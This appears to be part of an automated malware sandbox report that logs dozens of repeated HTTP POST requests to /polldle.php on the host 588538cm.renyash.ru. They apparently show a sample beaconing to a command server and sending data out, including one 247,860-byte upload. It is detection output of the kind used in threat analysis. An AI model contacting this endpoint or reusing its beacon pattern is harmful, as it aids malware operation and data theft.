                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 384Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1616Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2496Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1616Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1616Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1608Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 247860Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1608Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1596Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2496Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
